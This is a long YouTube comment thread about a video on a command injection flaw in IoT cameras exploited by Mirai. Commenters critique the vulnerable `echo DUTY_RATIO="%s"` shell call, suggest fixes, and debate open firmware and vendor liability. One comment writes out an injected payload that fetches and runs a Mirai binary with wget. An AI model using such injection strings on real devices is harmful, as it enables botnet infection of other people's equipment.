Hey Ed, are your courses beginner friendly? I have been learning C and still very much a newbie. I am interested in your courses, mainly C and Assembly. However, you are so advanced in your knowledge that I am nervous about joining to find out that it is way over my skill level, etc. I really am looking for an assembly that is ZERO to Hero type of course....
you should bring up this vid to Wendell at Level 1 Techs EDIT: he said years ago there's no standards. he even was working on setting up a DMZ type thing that looked at every single packet that went in and out of the IoT devices he used. without standards and open source, IoT is a risk to int'l security. maybe not the gov't, but int'l meaning the internet as we know it.
What's crazy is that there *is* sanitisation. Just above the offending line there is a line that removes character 0x22 from the input. That is the double-quote character, which would indeed be a way to attack the injection vulnerability. So somebody thought to defend against a possible injection, and still botched it. In this case, I would presume the LED value should be a number so just... Use %d instead of %s???
@@pfqnietThere's technically at least one extra step required (strtol() or similar to parse the string to a number), but yes, not hard. Maybe some quick range checks for good measure. When validating input, always validate maximally. Of course, running shell commands is the wrong way to do this anyway. I would reject this code review and have a friendly chat with the author.
@@pfqniet You can’t just change the %s to a %d; pcVar2 is a string (which is insane because they already are parsing it into an int). A better thing would be to use the iVar4 variable instead and then use %d. But even that is wrong. Look at what the commandline code is doing: writing a value to a file. This is pure laziness. The programmer should have just opened the /proc/driver/pwm file and written iVar4 to it. That would have removed even the possibility of a commandline injection since no shell would be launched. It even would be more efficient.
Reminds me of when I accidentally put a backslash at the end of a password (because it’s right next to the enter key) and due to lack of sanitization it crashed the whole system that it was running on. 😂 I’m not going to say which company but it was a massive one that put the services in the hands of 2 people who didn’t think to sanitize password fields
Exactly! This is a classic injection vulnerability. It might as well serve as an example of what not to do, and reminds me of several examples of what not to do when I learned how to do CGI programming in Perl in the 1990s. Why are they using the shell to do this? Why are they that lazy?
@@nicholasj3213Yeah and for many it would require new devices. Unless you made your purchasing decisions with that in mind, but the average person doesn't.
This. I had all my IP cameras placed into a VLAN that can only talk to one specific local IP which hosts my NVR software (Frigate), which runs in a non-privileged container (podman is great), on an SELinux-enabled RockyLinux 9 box. If an attacker can break in and out of this onion they can have all my data 😁
@andreffrosa That sadly is just a case of you get what you pay for, going with the ISPs wormbox or getting the cheapest option despite most people knowing someone atleast slightly technical person to ask for recommendations.
I didn't realize Mirai was still going on. For my cybersecurity class a few years ago I did a report on zombie botnets and this was a major thing. Its crazy that camera vendors (who Mirai was targeting before) didn't shore up that hole.
They care about profits and not security. Like seriously. Camera software isn't open source. There's no standards. How in the hell is the average consumer supposed to know. We need standards yesterday and a campaign to say just what is and what isn't acceptable.
Wait a second, why is it unpatchable if it allows executing external code? You could install the update _fixing_ that vulnerability _using_ that vulnerability!
Yes. And there have been computer viruses that fixed vulnerabilities the vendors refused to address. There was at least one that I know of regarding an ISP router.
There are also viruses that fix the vulnerabilities they use to penetrate the victim system, so other bad actors can't enter through the same door. It do be a competitive environment.
@@ujiltromm7358 there's also that story of a business opting not to remove a cryptomining malware because the ones who made it kept their systems updated and patched out any other people trying to hack it just to keep it to themselves.
I disagree about vendors not making firmware available. Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone? The issue is vendors writing shitty code and, more importantly, either not patching it when vulns are found, or, often, not even having the capability to patch it.
I think the worst of all possibilities is to have unencrypted firmware available without source. If the source was available, you at least increase the likelihood that security researchers may at least have a chance to catch bugs and propose fixes.
The golden rule in IT security is "obscurity is not security". This doesn't mean that keys should be published like microsoft likes do to "accidentally", but that the algorithm to protect something shouldn't rely on not being published. In the end it comes down to just desoldering the ROM with the firmware and reading its content. So, yes, every professional IT security expert will tell you that the Firmware should not rely on being a secret.
@@Adesterr If your point is that obscurity shouldn't be the entirety of your security strategy, we're in total agreement. My point is that, from a practical standpoint if making source available is off the table, obscuring the firmware provides some level of deterrence from the exploit being exposed. This along with diligent internal testing and code quality standards is a more reasonable security strategy than not obscuring the firmware.
"Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone?" - It is not more secure. More accurately, the question of whether open source software is more or less secure than closed software is unknowable because we don't know how secure either category really is. I would, however, point to Ed's 21 April 2024 video, "this is a warning to anyone using php", which highlighted a 24-year-old buffer overflow vulnerability in glibc. If "it can be audited by anyone" really meant superior security, then that vulnerability would not have persisted for 24 years. I do agree with your original point, however -- the firmware should be available, and security through obscurity is no security at all.
It's neither. If the code is secure, both people checking it for "secure" or "vulnerable" will find nothing. Now if it's NOT secure, and let's assume 100% competency, IF you have someone checking it for security they will spot it. IF. And IF it's any software with any decent amount of users, someone WILL be looking for vulns and spot it. The "many eyes" thing only works IF there's actually many (competent) eyes looking out for things...
I think Ed's old Router is a Netgear Nighthawk, probably an R7000. I recognise the hideous casing and 3 way antenna setup. I flashed mine with FreshTomato, way better then NG's stock fw
My Guess was the R6400 because the PCB layout is different. Unless there is a revision of the R7000 that looks like the R6400 which i have never seen then i think it must be a R6400.
@@VladSuperKat Yupp...but you can change the firmware on them. The worst was the blunder when they changed the chipset from Marwell to some Broadcom crap: oh boy, are those vulnerable at the hardware level :D
At least with a google search I could find photographs and articles about it, the shape of these Netgear routers is pretty recognizable. And I new about the trademark that it's known for the problems.
Companies, I would argue ARE 100% Liable, under Express Warranty. If you buy a product, they are expressing a warranty that there is nothing critically wrong or harmful with that item. A massive issue like this? I would 100% argue that breaks warranty and they are 100% Liable for any damage caused by the virus that was installed on your device because of their negligence of securing the device. But then again, I'm not a lawyer, and the courts don't care about consumers would side with the company who is paying them behind the scenes.
If they made no significant attempts at resolving the issue you probably could but the courts are notoriously behind the times on these issues. The other problem is how many of these products flooding Amazon are just overseas companies.
Software companies are notoriously exempt from liability. Almost every software product has a user agreement that basically tells you they are not responsible even if the software is entirely unfit for its purpose and accidentally blows up your house instead. The degree to which such user agreements can be uphold in the court of law varies, but in general it does. Judges know nothing about software so they rely on industry experts, who basically explain them it's some sort of extremely complex magic that cannot possibly come with any sort of guarantees.
@@jbird4478 Except that's for the software itself, not for the physical hardware product that just happened to contain that software. It's the responsibility of the manufacturer of the IoT device to figure this out. Either they develop their own stuff, or they can test open software, or they can hire a software company that's certified and has liability written in the contract. If an IoT device burns your house down, then it doesn't matter if it's a hardware problem or a software bug.
Judges decide any case however they want, including jury trials because they control exactly what the jury sees. So in the miu case they did not show the video of the 'children' attacking the old man only selected still photos, for example.
Full access to firmware is not a bad thing. In fact, it should be a requirement for any device. How else are you going to re-flash the device or maintain it without dependency on the manufacturer that may or may not exist anymore?
Why does this security camera have an operating system like linux to begin with? All it needs is 1) a bootloader, 2) minimalist networking software, 3) video encoding stuff, and some encryption algorithm that can be part of the networking binary or the video binary. The whole thing could be a single binary and be fully embedded, or it can be a few binaries running on freeRTOS. Why would a camera need wget? Why would it need bash? What's the upgrade path of "a camera"???
@@sasjadevries A crappy standalone camera I bought 10 years ago had its own embedded HTTP server, so you could configure all sorts of options. Not all of them connect to a central controller.
@@sasjadevries lets you do facial recognition and stuff locally, and compress the archives and so on. If you are doing bunch of stuff like that, at a point you are better off just using linux, cause you just let the user put on whatever they want on it instead of writing custom software and drivers. That said just don't connect your stuff directly to the internet. It's gonna get hacked.
@@mapu1 That is a good point, but with a catch. I would rather do "local" object recognition on a server that multiple cameras connect into. Mix and match any server with any software and any camera, without vendor lock-in. The cameras could be just wired analog ones, or at most something digitally compressed. Doing all the processing on the camera itself would make sense if you install the camera in a way that it can be jammed, because it has to be wireless, because it's on moving subject. Or if you only need one or two cameras for your property, and have no plans for expanding surveillance later.
You are providing a great service, both by explaining interesting topical exploits but also by providing real courses to get people better educated. I am now retired after 40+ years in IT, starting with 25 years of assembly programming on realtime kernels in the mainframe world, then transitioning to security. Lack of knowledge about how the machines actually work is very common amongst modern programmers. Improvements in knowledge should lead to more secure architectures and code. Please keep up the good work.
The attitude of “it’s just software” needs to go away. There needs to be an engineering rigor applied to get correct(ish) and safe software. We don’t allow civil engineers to self certify so why are we doing that with software?
This started in the 70s where software was given special consideration. No consumer protections, licensing restrictions, etc. Maybe these things and CrowdStrike may change things.
@@glynnetolar4423because everybody and their mom can write software and publish it. This is anti elitist, anarchistic and awesome for all of us. Medical device software needs to be certified bc it can kill ppl but nobody got ever killed by a software bug in a surveillance cam.
It's supply and demand. The need for software developers has grown exponentially (even logarithmically) over the last few decades. There are literally tens of millions of developers all over the world, and I would bet 99% of them do not have anything near a masters degree in engineering. Even if all companies required them to get advanced degrees and were willing to pay for that, there just aren't enough schools that could handle the load. And let's face it, most developers just start out working on business logic in spreadsheet macros, or modifying JavaScript. Eventually, they are asked to work on something that is over their head.
There are quite strict rules for certain categories of software, OD-178, iso26262 and the whole safety-critical branch for medical equipment, aviation, etc. Then the smarter governments usually have certifications for software handling personal data, payments, etc. But this stuff should just be broader, such that you had at least some of this for software in household appliances.
@@andrewpredmore2968 I would argue, that this demand is unjustified. Firstly, most agile developers are like stacking a framework on top of a framework, for something that could have been vanilla html+css generated from some markdown. Or they are shell scripting and pipelining filtering software A into filtering software B into conversion software, for what could have been a single shader. Secondly, these soydevs mess up, so you need another soy dev fixing (i.e. ducktaping) the other's work, and a scrum master and a selfproclaimed tester. Thirdly, even a small businesses, like a local bakery with 3 locations in your city, feels like it needs it's own app, because a website and PWA is not enough. And why would people make a few good tools, when you could make thousands of mediocre ones? Finally, that spreadsheet script is usually for a job that could have been automated away, and shouldn't have been done in a spreadsheet to begin with. p.s. ducktape is not a typo, "duck" is the canvas that the tape was made out of, before it was used for ducts😆.
@@timoadler6356 I'm guessing that the echo is just a shortcut in the code to writing to the particular file, as @TheRobbix1206 describes. I'm guessing that one can control the brightness by writing certain values into that particular file, just like one can control the swapiness of the Linux kernel by writing into '/proc/something/swapiness'. (I don't remember the specific file, but hopefully you still understand what I'm trying to say.)
@@timoadler6356(I forgot:) That is, I don't think it has anything to do with privilege escalation. (I'd have to go back and watch the video again to make sure, by carefully noting what was executed and with what specific file(s).)
Yeah, it's as I thought. After zooming in (on my hand computer that has radios), the specific shell command is `echo DUTY_RATIO="%s" > /proc/driver/pwm`. So it looks like 'pwm' is a virtual file where one can write certain configuration to control the camera. (The camera reads that file, parses it, and acts accordingly.) So, while the kernel wouldn't prevent access to that file (as OP suggests), presumably the parser for that file would error out upon finding an arbitrary string instead of the expected literal atomic value (float? int? word?), much less executing said arbitrary string, which could be something like `DUTY_RATIO=wget 0.0.0.0 -o /mirai && /mirai`.
@TheRobbix1206 If the binary has permission to execute a shell command that writes to a file, then the binary should have permission to write directly to that file, so the kernel wouldn't deny opening the file (unless the effective user somehow got changed, but I don't see anything in the code that does that).
I've not embraced IoT stuff because I have no faith in businesses to create products that are "safe" if they have no external obligation to do so. For example, pharmaceuticals are heavily regulated for good reason because they have the potential to cause great harm. I don't want stuff like that in my home, thanks. Great work, Ed.
Why is anyone surprised that bugs like this exist? The number of connected devices out there is enormous. The companies developing these are probably more interested in launching the product than spending yet another dollar on testing or implementing a safer language. I have no idea how to fight this. Regulation? Informed users? Videos like this :-) -> definitely! Thanks for a good walk-through.
I had a legal and ethics in computing course during the semester that the October 2016 Dyn ttack occurred. My group's assigned topic had to do with IoT devices. We had half of our project handed to us on a silver platter with that attack.
When people first started talking about networking elements and appliances in the home, I thought it was a pretty neat idea. When that became a reality and all those devices were connected to the Internet, I thought people were absolutely *insane* for using any of them. The closest thing to an IoT device I use is a Roku, and i'm happy to keep it that way. I even disable networking on my retro gaming PCs.
But how will I cook my food if my microwave can't connect to the Internet? How will I heat my home if my thermostat can't connect to the Internet? How will I know when my laundry is done if my washer and dryer can't connect to the Internet?
@@nomore6167 I mean, I get that you're joking, but it'll get to that point! It's already true that, where I live, I need to have a cell phone with its own separate data plan in order to activate a new modem for my cable broadband service. It's just ludicrous, but it's true....
@@MSThalamus-gj9oi Sadly, I believe you're right that it'll eventually get to that point. Either probably be a combination of people's laziness/"convenience" (wanting to be able to access everything from their phone), company greed (data collection / analytics for everything), company control, and planned obsolescence. Personally, I think it's bad enough right now when we need to go to a company's website to download the user manual for pretty much everything.
@@MSThalamus-gj9oi With regard to needing a cell phone to activate a new modem for your cable broadband service, what's the reason for that (if you don't mind me asking)? If it's because it requires an app, then it's even worse than simply requiring a cell phone; it'll probably require a relatively new cell phone because most companies will support only the latest device OS and maybe the one before that. I'm at that point right now with Capital One, my credit card provider. I have an iPhone 6s. Sure, it's 8 years old, but it does everything I need it to do. Except Apple doesn't allow this phone to upgrade to iOS 16.0 or above, and the Capital One app now requires iOS 16.0 or above. More accurately, the app says it supports my phone, and it will install on my phone, but when you open it, it says you need to upgrade to the latest iOS. So I lost the ability to get realtime notifications (about new charges, payment confirmation, fraud alerts, etc) and control my credit card from my phone simply because I refuse to buy a new phone.
If its not already regulated, this kind of software absolutly should be. And not just slaping the copany on the wrist when it gets found out, but something to prevent this from happening in the first place.
The bigger question is: Why `echo` into a file instead of, I dunno... just `fopen`ing the file and writing into it. It's not like `echo` is some sort of black magic, nor is the bash file pipe operation. I can't imagine that a program that can execute bash doesn't have access to `fopen`.
I am new to all of this and watch because its an interest. I had to go look up what input sanitation was and why you do it in code. After doing that, I watched the part where you explain the vulnerability and it made so much sense
"thanks Triple L, you're the best! I am a ***generic mobile user agent*** and I am very ***positive adjective*** that you were thinking of us!" ***actually viewing on a 1000:45 mega ultrawide with 10k smell-o-vision*** "...pft they dont even know im only pretending to be a mobile user"
0:42 Took me a minute to nail it down, but that specific router is the Netgear AC1900 wifi router (r7000). I can tell it's that rather than the AC1750 because yours has the usb port next to the wan port.
right when the exploit was shown, i failed to understand how someone could even do this, like, i fail to process how someone could do this and be like "what could go wrong" feels like programming became too accessible and we get vulnerabilities that could be prevented by thinking
I don't see you in my recommended often, but I am glad I clicked on this. I didn't realize you actually went through the binary and what not. It's really cool to see you do a technical dive in a layman-way, rather than just say "there is a vulnerability! ahh!"
Came down here for exactly this. They were so close, just use %d and that int var instead of the string... definitely a copy-paste-compile "hey it works" SHIP IT!
I'm always baffled by how those companies apparently never use code scans. I've actually made a similar mistake, that got flagged by a code scan before any deployment. I forgot to check one input which resulted in a potential full read access for the server directory. Joke is: I've could have sworn, that I did the check in the other module.
...I _cannot_ believe that code passed any kind of review. "Y'know, I could write three lines of code that fopen()s a file and fprintf()s to it, but that's for suckers. I think I will _LAUNCH A SHELL TO RUN AN ECHO COMMAND!"_ Anyone in the chain who let those lines of code pass by them (in that screenshot there's at least two other examples of completely unnecessary shell commands) -- from the original coder to the reviewers to the release engineers to the managers of same -- should find themselves in front of HR arguing why they should continue to work for the company.
A shell that no one would normally see no less. I worked security at a company I'm not going to name for a specific reason: guess what cameras and software they used? To get access to that print out, you gotta jump through some menus and you lose screen real estate, which is something you don't want when you're watching cameras for thieves and accidents. However, we had 3 monitors, so I'd have the camera's on 2 of them as I could fit just about every single camera in the whole warehouse that way, and still see what was happening, and on my left most monitor I had the thing that was displaying these messages and a notepad open. I'm also thankful that they had it set up in a way that my layout was tied to my account on their network, so when I logged into the computer and ran the software everything was already the way I had it, and I didn't have to worry about other guards messing with my shit. I actually was able to notify the people in charge of security multiple times that cameras were malfunctioning before it showed in the software by having that thing up, but the average user would have no idea it was there (I even had to teach the head of security how I did it, because she had no idea it was a thing).
@@bits360wastaken But... It is fixable with a new firmware version release. As long as users install the new firmware version, the issue is patched. Yes, it technically is unpatchable because they can't just send the update to the user's device to auto install it, but the post calling it unpatchable is a red herring to begin with as it makes people assume that the issue can't be fixed at all, which is not the case.
There are very creepy people out there that get enjoyment from hacking cameras and recording them live on the dark web. Be very careful with cameras. Even your webcam.
@@RubyCascade Here is some info that I wish I didn't know about: Search for the tag "hacked camera" in adult sites. That raises our paranoia to levels high enough that we want to warn all of our friends about keeping cameras on.
@@RubyCascade Once upon a time (10+ years ago) I was told that macbook cameras couldn't be powered without the green light turning on so that you knew it was being used. Later on I was told that it had been true but was no longer true, and could potentially be hacked at a firmware level. I have no idea of the validity of either of those claims.
@@DavidTriphon If you don't have a switch that physically cuts power to it, then it can totally be controlled by software :/ You can actually buy smartphones whithout camera and even microphone (so you need a headset to even use it as a phone). You can even order them to be shipped in tamper-evident packaging :)
@@reaperinsaltbrine5211 Those are prime targets for supply chain attacks, and factories that make consumer stuff arent profiling and hand picking people to assemble shit. I'd actually avoid that stuff like the plague if i was you. Tamper-evident packaging is just straight up marketing, its an illusion.
They did sanitize the input. They used a function with the word "safe" in its name before the system call, so they have met or exceeded the standard of IoT security.
@@Rudxain yes and no. Saying they did sanitize was sarcasm. The jab at the lack of security in IoT wasn't - there is a horrible lack of security across the board
I have zero clue what you are talking about 90% of the time but as a 2nd semester comp sci student, I love the structure of these videos! It’s fairly easy to follow along and it motivates me to learn more about cybersecurity:)
@@RabbitWatchShop wait until you hear about MSN Messenger and how emojis already existed back then during the early 00s. Some people don't like to use image based smileys / emoji.
Ugh, I'm not a programmer, just been around IT long enough to be familiar with some concepts. Over the years I've written myself stupid heinous shell scripts thousands of lines long, which I know competent programmers would cringe at. But as amateurish as my scripting is, I always deliberately included lots of sanity checks for any arguments / input. And for other actions. Yes because I don't want my script deleting a wrong file but even where that's not a possibility, I did it simply for the practice & the habit because I know that is a CORE COMPETENCY of programming which I may want to explore one day. This sort of shit is frustrating even for us who aren't programmers. Thanks for the explanation of it.
If you have built in cameras on your laptop do yourself a favor and buy yourself a six pack of webcam slide covers. $5 solution for a major problem. You just glue them to your screen or notch and can block your cam for the 99% of the time you are not using it.
The lack of security in IoT and "home automation" is a carryover from SCADA. That world has been focused on getting things working so much that they seemed to forget the vulnerabilities. I used constantly shake my head at the lack of security in PLC's, and other equipment, used in critical infrastructure and various other kinds of industrial automation. It's a mess, or at least used to be serval years ago.
To be fair: the SCADA world started way before globally connected networks were a reality and the sunk cost of all those systems make upgrading very costly. Also there are issues with QA and legal certfifications and the like.. Also: industrial control systems should be separated (if only for safety reasons) from other networks, with very narrow and well defined doors to the outside world. And frankly if operational safety and data/communications security are in conflict, I usually would pick safety.
@@reaperinsaltbrine5211, even with the separation, security was kicked down the timeline in the devices and PLC's. Until Stuxnet, there wasn't as big of a push for security, especially on the implementation side. At that time, manufacturers had considered and adopted it, but it wasn't used as it should have been. My comment was to focus on the implementation side, mostly, since that's what was carried over into home automation and IoT. Complacency in those industries was not a good example, yet was followed in the big IoT movement when it reached the market.
@@JarheadCrayonEater You have valid points. Although I think the "IoT" crappiness is more the result of extremeely low profit margins than anything else. Also people's preferring convenience over anything else. About complacency: may have a role in it in many places. The devices presented in the video are products of the typical Valley rent-seeking startup mentality. What frightens the crap out of me that this thinking is no creeping into medical devices, too, see NeuraLink: I don't want to have to do anything with those. Btw I do NOT have cameras, lights, fridge, anything that is allowed to communicate outside my network without expilcit permission. Hell, I deliberately stuck with good old mechanical lightswitches and a dumb fridge :D These things will fade out like any other fad, the question is after how many damage?
@@reaperinsaltbrine5211 , you have great points as well. It's not just one thing, as is usually the case. I'll just never forget when I started hearing the term "home automation" being used daily. I was a control system engineer on the pump stations in NOLA, among other industries, and just had to laugh at some of my stuff I saw coming out. Thinking "oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks".
@@JarheadCrayonEater oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks". Yeah...seems it is not only my experience. I sometimes surprised the whole thing didn't collapse on us yet :o) In the last ~20 years I mostly do infrastucture ops and the kludge-on-kludge patchwork I work with everyday LOL. Not to mention the kludges I put in there just to keep it rolling :/ New shiny things always get money....maintaining the guts of the system is an uphill battle :)
single handedly explained whole route people teach themself over decades, good job. btw why didn't you talk about the "unpatchable" nonsense in article title ?
*Shows Router guts* "Every router in this family was vulnerable to a zero-day-" Me, looking 3 feet to my right seeing the exact router he just held up... Hmm.
It looks like they tried to sanitize quotes (the single character 0x22 they remove) but didn't realize that double quotes still allow string interpolation? What I don't get is why don't they pass the atoi'd result into the sprintf? They only compare that value to zero so they can issue an extra disable command. They could have done the zero comparison without converting to an integer, and since they already took atoi, they could have avoided the main security bug by using the integer in the string interpolation. There are two bugs in six lines of code. :/
@@TeejMcSteezDude I connected my old nighthawk 6 months ago and in my router logs was a message from the shadow server foundation warning me that they detected a vulnerable router with their scanners. I found the message because my computer caught ransomware and I was investigating logs. Look them up, im serious. it was terrifying
Even more fun is that you can place an ad with an ad network that executes this code remotely when people run their web browsers on the same network as their IoT devices. I think it's crazy that "Triple-L" runs without any web browser plugins to secure his own network from drive-by malware.
But they've tried to sanitize the input and remove any double quotes (because the parameter is enquoted in ") The thing is bash/sh still parses it. They could've got away with this if they used single quotes as these are not parsed by the shell. Or just don't run pipe so simple things into a shell
> They could've got away with this if they used single quotes as these are not parsed by the shell. Then the attacker can just inject a single quote to close the string and follow up with whatever command they please anyway
This smells like code someone wrote at 2am as a part of a proof of concept that just stuck around into production, and no one's ever gone back, because that part of the code works and isn't driving new features. Which is part of why the feature focus of software development these days irks me. Our jobs are framed features that solve user stories, or enablers to features that solve user stories, but so rarely on upkeep. This code needed to be torn out and rewritten long ago, but customers aren't asking for that.
@1783W they do, but it's an invisible benefit. If your focus is delivering value every sprint, you can easily misinterpret that to be delivering visible value every sprint. It's a leadership problem, but I think it's broader than the leadership of any given organisation.
@@1783W You didnt even know this flaw existed until this video, why would fixing this bring any perceptible value to you? Customers dont care about this stuff, really. There should be a dedicated agency to regulate this kind of issue.
I think this definitely falls into gross negligence. The problem is: *Who wrote it *What certifications they had *What certifications / standards are even applicable? *What standards are even being presumed by the customer?
OMG they are litteraly just writing a string to a driver file!! WE HAVE A WRITE SYSCALL WHY ARE YOU SPAWNING A SHELLLLL!?!?!?!?!?! EVEN WITHOUT SANITIZATION THAT WOULD HAVE EASIER, FASTER AND SAFER
Yeah another one of these. I have seen tons of them. And it's weird that they never really get fixed or resolved. Even when a newer version of the same router comes out. It's like they start from scratch each time.
Downloadable firmware isn't bad -- open auditing is step one of a strong security engineering culture. If your security relies on obscurity, the bad guys will still find it but the good guys will have a harder time diagnosing it!
If they would have written their cgi code in bash, then they would not need to call system and the code is then secure. Yes. Most secure code for web applications is... the shell! Fight me!
@@__christopher__ what is counterintuitive but true: if the cgi is written in bash, you cannot exploit it, because instead of calling system() you just directly execute the thing. And if you directly execute, there is no exploitation possible.
This is good I think. Cause the hackers who already found the exploit use it.. so if you do not say anything, that means these people can record you in your home ... if they tell everyone about it, those people can turn off the camera.
Do you really have enough trust in any company to think that they'd mention about massive vulnerability or do you prefer if everyone was living in ignorance?
@@kentacy69 Well, knowing that this wont be fixed and that there's probably something similtar in the gear we're all using right now, i'd be tempted to choose ignorance just so i can be a little less anxious about this stuff.
As a low level software developer this channel is exactly what this area needs. This sub domain is filled with people that release in productions products with parts of generic demo software. They think if they know how to use Arduino or other hobby tools like that they are qualified to develop highly integrated devices with complex systems. I know there is a pressure from the management to develop fast products, but I think we should have to courage to say wait a little, let me write the code, and stop copy code that we have no idea what contains. Anyway.....I may be considered and old dinosaur, but I like to have every part of my code write by me and my guys.....so that if any thing happens we can understand why and from where it is happening. Yes this may take long, but surely helps during the life time of the project and also adds to the security of the product. Yeah use opensource code, but review it first and try to identify any weakness it may contain, don't copy-paste just so that management is happy. Any way....nice video...liked it!
Always validate input to a function, I've spent ours in the wee small hours fixing programs because there was no validation. The problem was usually nulls in a numeric field in a file coming from outside the business.
today i got asked again to turn on my cam and when absolut darkness was present and ppl got confused, i explained that i taped over my cam. thank you for letting me know my reevaluation was correct.
Man, I still remember first learning about IoT in around 2015 and my first thought was "Wait, that sounds dangerous" Good to know that even though I was technically new, it wasnt just me being a newbie and didnt know anything at the time
its ALWAYS the same way, ages ago we developed some protocols like smtp, pop, http and similar, guys writing the code NEVER thought about bad actors attacking those, that is why now we are fighting hard to have safer versions of such protocols, in parallel, it happened to e.g. machinery/cars communications protocols, not a single engineer developing CAN bus was expecting CAN bus exposed via wi-fi, and obviously for IoT it is even more difficult as very often it is coded by not very skilled people, never ever having any security experience, and their managers having such neither (obviously it also increases costs when cost is crucial to sell such crap), greetings from Poland, I love your vids sir
Funny how they thought that removing `"` (the 0x22 removal right before execution) is enough sanitization. I won't say that they do not sanitize, they didn't sanitize properly; which is a mark of someone who does know how the shell works.
IoT (and most embeded if we're to be honest) is "Ship fast" not "Ship good". The reason i write lots of stuff like that for my MCU's is that it's for personal use only, but if i ever was to ship anything, or heck, even put it on a public repo, I'd have to go and clean a lot of jank stuff.
Negligence is a failure to exercise reasonable care, while gross negligence is a reckless disregard for safety. It's just simple negligence, and you can bet it's disclaimed as such in the terms of sale echoing the UCC terms. If it ever got to court, the defense would have no shortage of experts willing to testify the bug isn't unreasonable care, and I can think of several possibilities under which I would agree. For example, whoever wrote the code may not have known that it would ever be exposed to the public internet.
go check out lowlevel.academy 😎
Need student discount too costly for Indian students from middle class family
Hey Ed, Why not create a course for reverse engineering?
Hey Ed, are your courses beginner friendly? I have been learning C and still very much a newbie. I am interested in your courses, mainly C and Assembly. However, you are so advanced in your knowledge that I am nervous about joining to find out that it is way over my skill level, etc. I really am looking for an assembly that is ZERO to Hero type of course....
is there a firmware that works on most cameras that is safe to use ?
you should bring up this vid to Wendell at Level 1 Techs
EDIT: he said years ago there's no standards. he even was working on setting up a DMZ type thing that looked at every single packet that went in and out of the IoT devices he used. without standards and open source, IoT is a risk to int'l security. maybe not the gov't, but int'l meaning the internet as we know it.
the S in IoT stands for Security
@@martinzihlmann822 original
This is perfect. Well done sir.
But there’s no s
@@GREG_WHEREISTHEMAYO that's the joke
Love this
0 sanitization on inputs that has a connection to system calls is insane.
What's crazy is that there *is* sanitisation. Just above the offending line there is a line that removes character 0x22 from the input. That is the double-quote character, which would indeed be a way to attack the injection vulnerability. So somebody thought to defend against a possible injection, and still botched it. In this case, I would presume the LED value should be a number so just... Use %d instead of %s???
@@pfqnietThere's technically at least one extra step required (strtol() or similar to parse the string to a number), but yes, not hard. Maybe some quick range checks for good measure. When validating input, always validate maximally.
Of course, running shell commands is the wrong way to do this anyway. I would reject this code review and have a friendly chat with the author.
Always whitelist valid input and reject everything else. However you do it, doesn't matter.
@@pfqniet You can’t just change the %s to a %d; pcVar2 is a string (which is insane because they already are parsing it into an int). A better thing would be to use the iVar4 variable instead and then use %d. But even that is wrong. Look at what the commandline code is doing: writing a value to a file. This is pure laziness. The programmer should have just opened the /proc/driver/pwm file and written iVar4 to it. That would have removed even the possibility of a commandline injection since no shell would be launched. It even would be more efficient.
Reminds me of when I accidentally put a backslash at the end of a password (because it’s right next to the enter key) and due to lack of sanitization it crashed the whole system that it was running on. 😂 I’m not going to say which company but it was a massive one that put the services in the hands of 2 people who didn’t think to sanitize password fields
This 100% counts as gross negligence, if my crappy online Python course can do user input validation, a _security_ company should be able to
Not when they hire the lowest common denominator coders and don't do your own penetration testing and code reviews with security experts.
Hell, I've made batch files that do a better job at input validation than this.
@@CrimeyCenter that sounds... Grossly negligent
Exactly! This is a classic injection vulnerability. It might as well serve as an example of what not to do, and reminds me of several examples of what not to do when I learned how to do CGI programming in Perl in the 1990s.
Why are they using the shell to do this? Why are they that lazy?
There's no good pay for embedded systems cybersec positions.
And THIS is why you run your Smarthome devices in their own VLAN with NO access to your other VLANs
Basically impossible for regular people.
Regular "routers" don't allow you to even do that even if people knew how
@@nicholasj3213Yeah and for many it would require new devices. Unless you made your purchasing decisions with that in mind, but the average person doesn't.
This. I had all my IP cameras placed into a VLAN that can only talk to one specific local IP which hosts my NVR software (Frigate), which runs in a non-privileged container (podman is great), on an SELinux-enabled RockyLinux 9 box. If an attacker can break in and out of this onion they can have all my data 😁
@andreffrosa That sadly is just a case of you get what you pay for, going with the ISPs wormbox or getting the cheapest option despite most people knowing someone atleast slightly technical person to ask for recommendations.
0:36 missed opportunity to say "Another day and another Zero-Day"
sounds like the opening to a song
day %= 2
@@subtlewolf Actually, it’d be `day %= 1`
@@subtlewolf Actually, it’d be day modulo 1
*@subtlewolf*
Actually, it would be day modulo 1
*(UA-cam* bots keep eating my comments)
I didn't realize Mirai was still going on. For my cybersecurity class a few years ago I did a report on zombie botnets and this was a major thing. Its crazy that camera vendors (who Mirai was targeting before) didn't shore up that hole.
It isn't a specific hole. That''s what she said.
Mirai, qbot and other families never stopped being active, due to there being hundreds of variants
camera vendors: meh
(continues spinning in chair)
They care about profits and not security. Like seriously. Camera software isn't open source. There's no standards. How in the hell is the average consumer supposed to know. We need standards yesterday and a campaign to say just what is and what isn't acceptable.
mirai is MOST DEFINITELY still going on. bunch of servers still getting requests from the botnet to try and backdoor through /cgi-bin/
Wait a second, why is it unpatchable if it allows executing external code? You could install the update _fixing_ that vulnerability _using_ that vulnerability!
Yes. And there have been computer viruses that fixed vulnerabilities the vendors refused to address. There was at least one that I know of regarding an ISP router.
There are also viruses that fix the vulnerabilities they use to penetrate the victim system, so other bad actors can't enter through the same door. It do be a competitive environment.
@@ujiltromm7358 there's also that story of a business opting not to remove a cryptomining malware because the ones who made it kept their systems updated and patched out any other people trying to hack it just to keep it to themselves.
Man, "spray and pray" is never how you want a successful security breach to be described.
I disagree about vendors not making firmware available. Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone? The issue is vendors writing shitty code and, more importantly, either not patching it when vulns are found, or, often, not even having the capability to patch it.
I think the worst of all possibilities is to have unencrypted firmware available without source. If the source was available, you at least increase the likelihood that security researchers may at least have a chance to catch bugs and propose fixes.
The golden rule in IT security is "obscurity is not security". This doesn't mean that keys should be published like microsoft likes do to "accidentally", but that the algorithm to protect something shouldn't rely on not being published. In the end it comes down to just desoldering the ROM with the firmware and reading its content.
So, yes, every professional IT security expert will tell you that the Firmware should not rely on being a secret.
@@Adesterr If your point is that obscurity shouldn't be the entirety of your security strategy, we're in total agreement. My point is that, from a practical standpoint if making source available is off the table, obscuring the firmware provides some level of deterrence from the exploit being exposed. This along with diligent internal testing and code quality standards is a more reasonable security strategy than not obscuring the firmware.
